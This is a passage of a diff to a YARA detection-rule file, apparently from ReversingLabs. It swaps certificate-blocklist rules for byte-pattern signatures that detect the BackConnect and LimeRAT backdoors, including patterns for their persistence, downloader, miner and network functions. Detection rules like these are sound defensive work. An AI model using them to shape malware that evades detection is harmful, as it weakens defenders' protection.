+            50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 7E ?? EB
+            ?? 83 EC ?? 6A ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 45 ?? ?? 83 7D ?? ?? 76
+        }
+		$hook_accept_function_p2 = {
+            83 7D ?? ?? 76 ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 79 ?? E9 ?? ??
+            ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 79 ?? E9 ??
+            ?? ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B
+            45 ?? 3B 45 ?? 75 ?? EB ?? 83 EC ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 45 ?? ?? 81
+            7D ?? ?? ?? ?? ?? 7E ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 79 ?? 83 EC ?? FF 75 ??
+            E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? 6A ?? E8 ?? ?? ?? ?? 83 EC ?? FF 75 ?? FF 75 ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 79 ?? 83 EC ?? 6A ?? E8 ?? ?? ?? ?? 83 EC
+            ?? 6A ?? E8 ?? ?? ?? ?? 83 EC ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? 6A ?? E8
+            ?? ?? ?? ?? 83 EC ?? 6A ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? FF 75 ??
+            E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 8B 00 83 EC ?? 50 6A ?? FF 75 ??
+            E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 8B 55 ?? 89 10 83 EC ?? FF 75 ?? FF 75 ?? FF 75 ??
+            E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8B 45 ?? 8B 5D ?? C9 C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE6\\x97\\xA5\\xE7\\x85\\xA7\\xE5\\xB3\\xB0\\xE5\\xB7\\x9D\\xE5\\x9B\\xBD\\xE9\\x99\\x85\\xE7\\x9F\\xBF\\xE4\\xB8\\x9A\\xE8\\xB4\\xB8\\xE6\\x98\\x93\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "53:05:91:c6:1b:5e:12:12:f6:59:13:8b:7c:ea:0a:97" and 1403654399 <= pe.signatures [ i ] . not_after )
+		uint32( 0 ) == 0x464C457F and ( $create_backdoor_socket ) and ( all of ( $backdoor_dataforward_p* ) ) and ( $main_constructor ) and ( all of ( $hook_accept_function_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_07270Ff9 : INFO FILE
+rule REVERSINGLABS_Win64_Backdoor_Backconnect : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects BackConnect backdoor."
 		author = "ReversingLabs"
-		id = "fcd2d82a-b51d-53ff-bfae-3c83147c1903"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "2c65c7ea-8546-5423-a1e7-dc7c12663099"
+		date = "2025-04-11"
+		modified = "2025-04-11"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L765-L781"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "8f0da7c330464184fa1d5bf8d51dd8ad2e8637710a36972dcab03629cb57e910"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/backdoor/Win64.Backdoor.BackConnect.yara#L1-L154"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "7089d5f2dab21755e83ca81ea6cf0f8a55fa261fa2c556759812b16a3d78608a"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "BackConnect"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DigiNotar Cyber CA" and pe.signatures [ i ] . serial == "07:27:0f:f9" and 1308182400 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_0727100D : INFO FILE
-{
-	meta:
-		description = "The digital certificate has leaked."
-		author = "ReversingLabs"
-		id = "1ee866ec-a445-5a79-b824-37f28a49f20b"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L783-L799"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "a09f4004ed002b90d67a3baddde74832e6c7b70e8b330347ef169460750aa344"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$network_communication_p1 = {
+            48 89 5C 24 ?? 4C 89 44 24 ?? 48 89 4C 24 ?? 55 56 57 41 54 41 55 41 56 41 57 48 83
+            EC ?? 45 33 F6 4C 8B EA 45 8B FE 41 8B EE 41 8B FE 48 8B D9 48 8B 05 ?? ?? ?? ?? 44
+            3B B8 ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 48 8B 88 ?? ?? ?? ?? 44 39 74 39 ?? 0F 84 ?? ??
+            ?? ?? 48 8B 4C 39 ?? 41 FF C7 48 83 F9 ?? 0F 84 ?? ?? ?? ?? 49 8B D0 FF 15 ?? ?? ??
+            ?? 85 C0 48 8B 05 ?? ?? ?? ?? 48 8B 88 ?? ?? ?? ?? 74 ?? 44 89 74 24 ?? 48 8D 84 24
+            ?? ?? ?? ?? 44 89 B4 24 ?? ?? ?? ?? 4C 8D 4C 24 ?? 48 8B 4C 39 ?? BA ?? ?? ?? ?? 41
+            B8 ?? ?? ?? ?? 48 89 44 24 ?? FF 15 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 41 B0 ?? 48 8B
+            81 ?? ?? ?? ?? 44 88 74 07 ?? 8B C5 48 6B D0 ?? 48 03 91 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            E9 ?? ?? ?? ?? 48 8B 4C 39 ?? 49 8B D5 FF 15 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 85 C0
+            74 ?? 4C 8B 81 ?? ?? ?? ?? 42 80 7C 07 ?? ?? 75 ?? 8B C5 48 6B D0 ?? 49 03 D0 E8 ??
+            ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 8B 89 ?? ?? ?? ?? 49 8B D5 48 8B 4C 39 ?? FF 15 ??
+            ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 8B D3 44 8B E0 48 8B 89 ?? ?? ?? ?? 48 8B 4C 39 ??
+            FF 15 ?? ?? ?? ?? 48 8B 35 ?? ?? ?? ?? 44 8B F0 48 8B 9E ?? ?? ?? ?? 48 03 DF 83 7B
+            ?? ?? 0F 84 ?? ?? ?? ?? 33 C9 E8 ?? ?? ?? ?? 80 7B ?? ?? 75 ?? 48 2B 43 ?? 48 83 F8
+            ?? 7E ?? 48 83 4B ?? ?? 45 33 F6 44 89 73 ?? 41 B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 45 85
+        }
+		$network_communication_p2 = {
+            F6 74 ?? 48 8B 15 ?? ?? ?? ?? 45 33 C9 48 8B 4B ?? 41 B8 ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 45 33 F6 85 C0 74 ?? 83 F8 ?? 75 ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 3D ??
+            ?? ?? ?? 75 ?? 41 8B C6 EB ?? 85 C0 78 ?? 01 43 ?? BA ?? ?? ?? ?? 4C 8B 0D ?? ?? ??
+            ?? 48 8B CE 44 8B 43 ?? 89 44 24 ?? E8 ?? ?? ?? ?? EB ?? 48 8B 4B ?? FF 15 ?? ?? ??
+            ?? 48 83 4B ?? ?? E9 ?? ?? ?? ?? 45 33 F6 45 85 E4 0F 84 ?? ?? ?? ?? 44 8B 43 ?? 45
+            85 C0 0F 84 ?? ?? ?? ?? 48 8B 53 ?? 45 33 C9 48 8B 4B ?? FF 15 ?? ?? ?? ?? 83 F8 ??
+            75 ?? FF 15 ?? ?? ?? ?? 48 8B 4B ?? FF 15 ?? ?? ?? ?? 48 83 4B ?? ?? 41 B8 ?? ?? ??
+            ?? 48 8B D3 44 89 73 ?? 48 8B CE E8 ?? ?? ?? ?? EB ?? 48 8B 4B ?? 29 43 ?? 44 8B 43
+            ?? 01 43 ?? 48 63 D0 48 03 D1 E8 ?? ?? ?? ?? 8A 4B ?? F6 C1 ?? 74 ?? 8B 43 ?? C1 E8
+            ?? 39 43 ?? 77 ?? 44 8B 43 ?? 80 E1 ?? 45 33 C9 88 4B ?? 48 8B CE 44 89 74 24 ?? 41
+            8D 51 ?? E8 ?? ?? ?? ?? F6 43 ?? ?? 74 ?? 44 39 73 ?? 75 ?? 45 33 C0 48 8B D3 48 8B
+            CE E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 4C 8B 84 24 ?? ?? ?? ?? FF C5 48 83 C7 ??
+            81 FD ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 33 C0 48 8B 9C 24 ?? ?? ?? ?? 48 83 C4 ?? 41 5F
+            41 5E 41 5D 41 5C 5F 5E 5D C3
+        }
+		$get_system_information = {
+            48 89 5C 24 ?? 48 89 74 24 ?? 48 89 7C 24 ?? 55 41 54 41 55 41 56 41 57 48 8B EC 48
+            81 EC ?? ?? ?? ?? 48 8B F9 48 8D 4D ?? FF 15 ?? ?? ?? ?? 4C 8B 75 ?? 48 81 FF ?? ??
+            ?? ?? 76 ?? 48 8D 87 ?? ?? ?? ?? 4C 3B F0 4C 0F 42 F0 48 8B 1D ?? ?? ?? ?? 4C 8D A7
+            ?? ?? ?? ?? 4C 39 65 ?? 4C 0F 46 65 ?? 49 81 EC ?? ?? ?? ?? 33 F6 48 85 DB 74 ?? 49
+            3B DE 72 ?? 49 3B DC 73 ?? 48 39 73 ?? 0F 85 ?? ?? ?? ?? 48 8B 1B EB ?? 4C 8B FF 49
+            3B FE 72 ?? 44 8B 6D ?? 33 D2 49 8B C7 49 F7 F5 4C 2B FA 4D 2B FD 4D 3B FE 72 ?? 41
+            B8 ?? ?? ?? ?? 48 8D 55 ?? 49 8B CF FF 15 ?? ?? ?? ?? 48 85 C0 74 ?? 81 7D ?? ?? ??
+            ?? ?? 74 ?? 4C 8B 7D ?? 4D 3B FD 72 ?? EB ?? 4D 85 FF 74 ?? BA ?? ?? ?? ?? 41 B9 ??
+            ?? ?? ?? 41 B8 ?? ?? ?? ?? 49 8B CF FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 0F 85 ?? ??
+            ?? ?? 4D 3B FE 73 ?? 48 85 DB 0F 85 ?? ?? ?? ?? 49 3B FC 0F 87 ?? ?? ?? ?? 44 8B 7D
+            ?? 33 D2 48 8B C7 45 8B F7 49 F7 F7 41 8B C7 48 2B C2 48 03 C7 48 8B F8 49 3B C4 0F
+            87 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8D 55 ?? 48 8B CF FF 15 ?? ?? ?? ?? 48 85 C0 0F
+            84 ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? 74 ?? 33 D2 41 8D 7F ?? 48 03 7D ?? 48 03 7D ??
+            48 8B C7 49 F7 F6 48 2B FA 49 3B FC EB ?? 48 85 FF 74 ?? BA ?? ?? ?? ?? 41 B9 ?? ??
+            ?? ?? 41 B8 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 E9 ?? ?? ?? ??
+            48 8D 4B ?? 89 73 ?? BA ?? ?? ?? ?? 48 89 31 48 8B C1 48 89 4B ?? 48 83 C2 ?? 48 83
+            C1 ?? 48 8B F0 48 81 FA ?? ?? ?? ?? 76 ?? 48 8B 05 ?? ?? ?? ?? 48 89 03 48 89 1D ??
+            ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 48 8B C3 49 8B 5B ?? 49 8B 73 ?? 49 8B 7B ?? 49 8B
+            E3 41 5F 41 5E 41 5D 41 5C 5D C3
+        }
+		$get_dns_servers_p1 = {
+            4C 8B DC 49 89 5B ?? 55 56 57 41 56 41 57 48 83 EC ?? 83 64 24 ?? ?? 49 8D 43 ?? 33
+            D2 49 89 43 ?? 49 83 63 ?? ?? 45 33 C9 45 33 C0 8D 7A ?? 8B CF FF 15 ?? ?? ?? ?? 8B
+            44 24 ?? 8D 6F ?? 85 C0 0F 84 ?? ?? ?? ?? 8B C8 8B D5 E8 ?? ?? ?? ?? 48 8B D8 48 85
+            C0 0F 84 ?? ?? ?? ?? 48 8D 44 24 ?? 45 33 C9 48 89 44 24 ?? 45 33 C0 33 D2 48 89 5C
+            24 ?? 8B CF FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 0B 8B D5 C1 E1 ?? 03 CD E8
+            ?? ?? ?? ?? 48 8B F0 48 85 C0 74 ?? 33 FF 39 3B 76 ?? 8B 4C BB ?? FF 15 ?? ?? ?? ??
+            48 8B D0 48 8B CE FF 15 ?? ?? ?? ?? 8B 03 2B C5 3B F8 73 ?? 48 8D 15 ?? ?? ?? ?? 48
+            8B CE FF 15 ?? ?? ?? ?? 03 FD 3B 3B 72 ?? 45 33 C9 4C 8D 05 ?? ?? ?? ?? 48 8B D6 48
+            8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 48 8B D8 E8 ?? ?? ?? ?? 48 8B CB 4C 8B F0
+            E8 ?? ?? ?? ?? EB ?? 48 8B CB E8 ?? ?? ?? ?? 45 33 F6 83 64 24 ?? ?? 48 8D 44 24 ??
+            48 89 44 24 ?? 45 33 C9 48 83 64 24 ?? ?? 45 33 C0 33 D2 33 C9 FF 15 ?? ?? ?? ?? 8B
+            44 24 ?? 85 C0 74 ?? 8D 48 ?? 48 8B D5 E8 ?? ?? ?? ?? 48 8B D8 48 85 C0 74 ?? 48 8D
+        }
+		$get_dns_servers_p2 = {
+            44 24 ?? 45 33 C9 48 89 44 24 ?? 45 33 C0 33 D2 48 89 5C 24 ?? 33 C9 FF 15 ?? ?? ??
+            ?? 85 C0 75 ?? 45 33 C9 4C 8D 05 ?? ?? ?? ?? 48 8B D3 48 8D 0D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 48 8B E8 EB ?? 48 8B CB E8 ?? ?? ?? ?? 33 ED 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 48 8B D8 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F8 8D 53 ?? 8D
+            4F ?? E8 ?? ?? ?? ?? 48 8B D8 48 85 C0 74 ?? 4C 8B C7 48 8D 15 ?? ?? ?? ?? 4D 03 C0
+            48 8B C8 E8 ?? ?? ?? ?? 45 33 C9 4C 8D 05 ?? ?? ?? ?? 48 8B D3 48 8D 0D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 4C 8B F8 48 85 DB 74 ?? 48 8B CB E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85
+            ED 48 8D 15 ?? ?? ?? ?? 4C 8D 0D ?? ?? ?? ?? 4D 8B C7 48 0F 45 D5 49 8B CE 48 83 64
+            24 ?? ?? 48 8B F0 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8B C8 48 8B F8 E8 ?? ?? ?? ?? 49
+            8B CE 48 8B D8 E8 ?? ?? ?? ?? 48 8B CD E8 ?? ?? ?? ?? 49 8B CF E8 ?? ?? ?? ?? 48 8B
+            CE E8 ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 48 8B C3 48 8B 5C 24 ?? 48 83 C4 ?? 41 5F
+            41 5E 5F 5E 5D C3
+        }
+		$get_network_interfaces_p1 = {
+            48 8B C4 48 89 58 ?? 48 89 70 ?? 57 41 56 41 57 48 81 EC ?? ?? ?? ?? B9 ?? ?? ?? ??
+            89 48 ?? E8 ?? ?? ?? ?? 48 8B F0 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ??
+            48 8B C8 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 48 8B CE E8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 48 8B F0 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? FF 15 ??
+            ?? ?? ?? 8B D8 BA ?? ?? ?? ?? 8D 4B ?? E8 ?? ?? ?? ?? 48 8B F8 48 85 C0 74 ?? 4C 8B
+            C3 48 8D 15 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 8B CE FF
+            15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 4C 8B F6 48 85 F6 0F 84 ?? ?? ?? ?? 4C 8D 3D
+            ?? ?? ?? ?? 48 83 64 24 ?? ?? 48 8D 05 ?? ?? ?? ?? 4D 8D 86 ?? ?? ?? ?? 48 89 44 24
+            ?? 4D 8B CF 48 8D 15 ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 45 8B 8E ?? ?? ?? ?? 48 8B
+            F8 41 8B C9 83 E9 ?? 74 ?? 83 E9 ?? 74 ?? 83 E9 ?? 74 ?? 83 E9 ?? 74 ?? 83 E9 ?? 74
+            ?? 83 E9 ?? 74 ?? 83 E9 ?? 74 ?? 83 F9 ?? 74 ?? 4C 8D 05 ?? ?? ?? ?? BA ?? ?? ?? ??
+            48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8D 54 24 ?? EB ?? 48 8D 15 ?? ?? ?? ?? EB ?? 48 8D
+            15 ?? ?? ?? ?? EB ?? 48 8D 15 ?? ?? ?? ?? EB ?? 48 8D 15 ?? ?? ?? ?? EB ?? 48 8D 15
+            ?? ?? ?? ?? EB ?? 48 8D 15 ?? ?? ?? ?? EB ?? 48 8D 15 ?? ?? ?? ?? EB ?? 48 8D 15 ??
+            ?? ?? ?? 45 33 C0 48 8B CF E8 ?? ?? ?? ?? 48 83 64 24 ?? ?? 4D 8D 86 ?? ?? ?? ?? 48
+        }
+		$get_network_interfaces_p2 = {
+            8B C8 48 8D 15 ?? ?? ?? ?? 4D 8B CF E8 ?? ?? ?? ?? 48 83 64 24 ?? ?? 4D 8D 86 ?? ??
+            ?? ?? 4D 8B CF 48 8D 15 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 83 64 24 ?? ?? 4D 8D
+            86 ?? ?? ?? ?? 4D 8B CF 48 8D 15 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 41 83 BE ?? ??
+            ?? ?? ?? 48 8B C8 74 ?? 48 83 64 24 ?? ?? 4D 8D 8E ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ??
+            4C 89 7C 24 ?? 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 45 33 C0 48 8D 15 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 41 83 BE ?? ?? ?? ?? ?? 74 ?? 4D 8D 86 ?? ?? ?? ?? 45 33 C9 48 8D
+            15 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 4D 8D 86 ?? ?? ?? ?? 41 80 38 ?? 74 ?? 45 33
+            C9 48 8D 15 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 4D 8B 36 48 8D 15 ?? ?? ?? ?? 45 33
+            C0 48 8B C8 E8 ?? ?? ?? ?? 48 8B F8 4D 85 F6 0F 85 ?? ?? ?? ?? EB ?? 48 85 F6 74 ??
+            48 8B CE E8 ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 48 8B CF 48 8B D8 E8 ?? ?? ?? ?? 48
+            8B C3 EB ?? 33 C0 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B 73 ?? 49 8B E3 41 5F 41
+            5E 5F C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DigiNotar Cyber CA" and pe.signatures [ i ] . serial == "07:27:10:0d" and 1308182400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $network_communication_p* ) ) and ( $get_system_information ) and ( all of ( $get_dns_servers_p* ) ) and ( all of ( $get_network_interfaces_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_07271003 : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Backdoor_Limerat : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects LimeRAT backdoor."
 		author = "ReversingLabs"
-		id = "7573c436-5bf9-5522-9952-e30dbbccd092"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "c2ef6f27-3fb8-55f4-97a6-9e25a3d1ce49"
+		date = "2024-03-04"
+		modified = "2024-03-04"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L801-L817"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "14c201b4fdda5b3553732a173a3d6705129c54f2a50d26997d63a77be8504285"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/backdoor/ByteCode.MSIL.Backdoor.LimeRAT.yara#L1-L91"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "03eaa2ac41950f036601222b32a28c03aae3b3445501e988e2f87e231a1a1522"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "LimeRAT"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$persistence_mechanism = {
+            02 2C ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ??
+            28 ?? ?? ?? ?? 16 16 15 28 ?? ?? ?? ?? 26 2B ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ??
+            ?? ?? ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 28 ?? ??
+            ?? ?? 28 ?? ?? ?? ?? DE
+        }
+		$crypto_miner = {
+            72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 8E 69 16 31 ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 0B 07 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 08 6F ?? ?? ?? ?? 0D 2B ?? 09 6F ?? ??
+            ?? ?? 74 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? ?? 0A DE ?? 09 6F ?? ?? ?? ?? 2D ?? DE ?? 09 2C ?? 09
+            6F ?? ?? ?? ?? DC DE ?? 25 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? DE ?? 28 ?? ?? ?? ??
+            0A DE ?? 25 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? DE ?? 06
+        }
+		$downloader = {
+            73 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 7E
+            ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 2C ?? 72 ?? ?? ??
+            ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 2C ?? 06 7E ?? ?? ?? ?? 07 6F ??
+            ?? ?? ?? 07 28 ?? ?? ?? ?? 26 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 2B ??
+            06 7E ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 07 28 ?? ?? ?? ?? 26 00 06 6F ?? ?? ?? ?? 14 0A
+            DE ?? 25 28 ?? ?? ?? ?? 0C 28 ?? ?? ?? ?? DE ?? DE ?? 25 28 ?? ?? ?? ?? 0D 28 ?? ??
+            ?? ?? DE
+        }
+		$network_communication_p1 = {
+            16 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 25 28 ?? ?? ?? ?? 0B 28 ?? ??
+            ?? ?? DE ?? 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 25 28 ?? ?? ?? ?? 0C 28 ?? ?? ??
+            ?? DE ?? 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 25 28 ?? ?? ?? ?? 0D 28 ?? ?? ?? ??
+            DE ?? 00 73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ??
+            7E ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 15 6F ?? ?? ?? ?? 7E ??
+            ?? ?? ?? 15 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 73 ??
+            ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 14 72 ?? ?? ?? ?? 17 8D ?? ?? ?? ??
+            25 16 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 14 14 14 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ??
+            ?? ?? ?? 15 16 28 ?? ?? ?? ?? 13 ?? 11 ?? 16 9A 80 ?? ?? ?? ?? 73 ?? ?? ?? ?? 26 11
+            ?? 73 ?? ?? ?? ?? 17 11 ?? 8E 69 6F ?? ?? ?? ?? 9A 28 ?? ?? ?? ?? 80 ?? ?? ?? ?? 11
+            ?? 6F ?? ?? ?? ?? DE ?? 25 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? DE ?? DE ?? 11 ?? 2C
+            ?? 11 ?? 6F ?? ?? ?? ?? DC 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ??
+            ?? 17 80 ?? ?? ?? ?? 73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 1F ?? 8D ?? ?? ?? ?? 25 16 72 ??
+            ?? ?? ?? A2 25 17 7E ?? ?? ?? ?? A2 25 18 28 ?? ?? ?? ?? A2 25 19 7E ?? ?? ?? ?? A2
+        }
+		$network_communication_p2 = {
+            25 1A 28 ?? ?? ?? ?? A2 25 1B 7E ?? ?? ?? ?? A2 25 1C 72 ?? ?? ?? ?? A2 25 1D 7E ??
+            ?? ?? ?? A2 25 1E 28 ?? ?? ?? ?? A2 25 1F ?? 72 ?? ?? ?? ?? A2 25 1F ?? 28 ?? ?? ??
+            ?? A2 25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ?? ??
+            A2 25 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 28 ?? ?? ?? ?? A2
+            25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ?? ?? A2 25
+            1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ?? ?? 8C ?? ??
+            ?? ?? A2 25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ??
